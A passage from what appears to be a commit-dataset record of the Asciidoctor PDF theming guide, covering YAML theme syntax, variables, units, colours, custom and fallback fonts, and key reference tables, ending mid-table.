<<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>^[1]^\n|quoted string\n|center: '\\{page-number}'\n|===\n\n^[1]^ `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\n==== Implicit attributes\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nHere's an example that shows how these attributes can be used in the running footer:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running footer.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n image_valign: 2 # <1>\n recto_content:\n left: image:footer-logo.png[width=80]\n right: '{page-number}'\n verso_content:\n left: $footer_recto_content_right\n right: $footer_recto_content_left\n----\n<1> You can use the `footer_valign` attribute to slighly nudge the image up or down.\n\nCAUTION: The image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly.\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7077b701692290165856eb564f4794b051d622c9","subject":"clarify a few things about the pdf theme attributes","message":"clarify a few things about the pdf theme attributes\n","repos":"mojavelinux\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* transparent color\n* additional fonts provided by Asciidoctor PDF\n* images\n* title page layout\n* title image\n* title page background image\n* keys\n* how to apply the theme\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties, but only a fraction of what CSS supports.\nUnlike CSS, all selectors are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_color`).\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme.\nThe converter uses the information from this map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions in the next section.\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: Like programming languages, multiple and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, us humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nPENDING\n\n== Fonts\n\nYou can select from built-in PDF fonts or custom fonts loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF file of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [2]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_h<n>_font_color\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_h<n>_font_family\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_h<n>_font_size\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_style\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n=== Title page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n\/\/ Blocks include admonition, example, quote, verse, sidebar, image, listing, literal, and table.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\n=== Caption\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_colorL EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,5,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 